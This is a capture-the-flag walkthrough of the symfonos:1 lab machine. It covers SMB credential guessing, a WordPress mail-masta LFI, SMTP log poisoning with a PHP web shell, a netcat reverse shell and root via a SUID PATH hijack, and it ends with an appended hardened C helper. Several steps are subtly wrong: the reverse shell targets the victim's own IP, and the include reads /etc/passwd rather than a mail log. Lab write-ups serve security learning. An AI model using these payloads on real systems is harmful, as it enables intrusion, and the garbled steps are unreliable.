symfonos: 1 Walkthrough

Dark-0
3 min read · Dec 25, 2020


Description:

Beginner real-life-based machine designed to teach an interesting way of obtaining a low-priv shell. SHOULD work for both VMware and VirtualBox.

  • Name: symfonos: 1
  • Difficulty: Beginner
  • Tested: VMware Workstation 15 Pro & VirtualBox 6.0
  • DHCP Enabled

Note: You may need to update your hosts file for symfonos.local

Scanning

We always start with network scanning. Let's find the target IP address by running netdiscover.

$ sudo netdiscover -i vboxnet0 -r 10.10.10.1/16

As we can see in the netdiscover result, our target IP address is 10.10.10.22.

Our next step is scanning the target machine. Let's start with nmap.

$ nmap -p- -sV 10.10.10.22

Enumeration

SMB share folder

$ smbclient //10.10.10.22/anonymous

smb: \> get attention.txt

$ cat attention.txt

Here we have a user, Zeus, and some passwords: 'epidioko', 'qwerty' and 'baseball'!

I tried to log in to SMB as user helios with the three passwords, and luckily helios:qwerty worked.

$ smbclient -U helios //10.10.10.22/helios

Let's check out both files, research.txt and todo.txt.

todo.txt gives a hint to work on /h3l105. Let's quickly visit http://10.10.10.22/h3l105.

Heyy..!!! WordPress is here, but we need to edit our hosts file to add symfonos.local.

$ vim /etc/hosts

Exploiting..!!

Now we'll use wpscan for further enumeration of the installed plugins.

$ wpscan --url http://symfonos.local/h3l105 -e ap

mail-masta 1.1 is vulnerable to LFI (EDB-ID: 40290).

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

To convert the LFI into RCE we'll use the SMTP log poisoning approach: we connect to the SMTP service via telnet and type the following commands to inject the PHP code into the mail log.

$ telnet 10.10.10.22 25

MAIL FROM: <dark0>

RCPT TO: Helios

data

<?php system($_GET['c']); ?>

With that in place, we can get our reverse shell.

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd&c=nc -e /bin/bash 10.10.10.22 1234

Hit the URL and turn on the listener. Once the shell lands, upgrade it to a TTY and look for SUID binaries.

$ python3 -c 'import pty; pty.spawn("/bin/bash")'

$ find / -perm -u=s -type f 2>/dev/null

Way to root ..!!!!

$ cd /tmp
$ echo "/bin/sh" > curl
$ chmod 777 curl
$ echo $PATH
$ export PATH=/tmp:$PATH
$ /opt/statuscheck
# id
# cd /root
# cat proof.txt
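The root step works because the SUID statuscheck binary runs curl by bare name and trusts the caller's PATH. The page does not show the source of /opt/statuscheck, so the following is an added example of my own (not the machine's code) of how such a helper should be written: the tool is resolved against a fixed trusted PATH and executed with execve and a program-built environment, so a writable directory prepended to PATH changes nothing.

```c
/* Hardened form of a privileged status-check helper. The weak pattern that
 * the PATH hijack above abuses is
 *     system("curl -I http://localhost/");   (bare name, caller's PATH, shell)
 * Here the tool is resolved against a fixed trusted PATH and run via execve
 * with an environment built by the program, not inherited from the caller. */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

#define TRUSTED_PATH "/usr/local/bin:/usr/bin:/bin"

/* Resolve a bare command name against TRUSTED_PATH only. Returns 1 and writes
 * the absolute path into `out` on success, 0 otherwise. Names containing '/'
 * are rejected so a caller cannot pass "../tmp/curl" or "/tmp/curl". */
int resolve_trusted(const char *name, char *out, size_t outlen) {
    if (name == NULL || *name == '\0' || strchr(name, '/') != NULL)
        return 0;
    char dirs[] = TRUSTED_PATH;                     /* strtok needs a writable copy */
    for (char *dir = strtok(dirs, ":"); dir; dir = strtok(NULL, ":")) {
        int n = snprintf(out, outlen, "%s/%s", dir, name);
        if (n < 0 || (size_t)n >= outlen)
            return 0;
        if (access(out, X_OK) == 0)
            return 1;
    }
    return 0;
}

/* Run `name` with an explicit argv and a minimal environment; no shell is
 * involved. Returns the child's exit status, or -1 on failure. */
int run_trusted(const char *name, char *const argv[]) {
    char path[4096];
    if (!resolve_trusted(name, path, sizeof path))
        return -1;
    char *const envp[] = { "PATH=" TRUSTED_PATH, NULL }; /* caller's env dropped */
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(path, argv, envp);
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

The trusted path list and the 4096-byte buffer are assumptions for the example; a real helper would pair this with dropping the SUID bit in favour of a narrowly scoped sudo rule or capability.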

That's it..!! Thanks for reading. Stay tuned for similar walkthroughs and much more.

:- Dark-0

Written by Dark-0: Learning stuff in cybersecurity, preparing for the OSCP certification. #penetration_tester, CTF player, bug hunter. https://twitter.com/dark0sombre
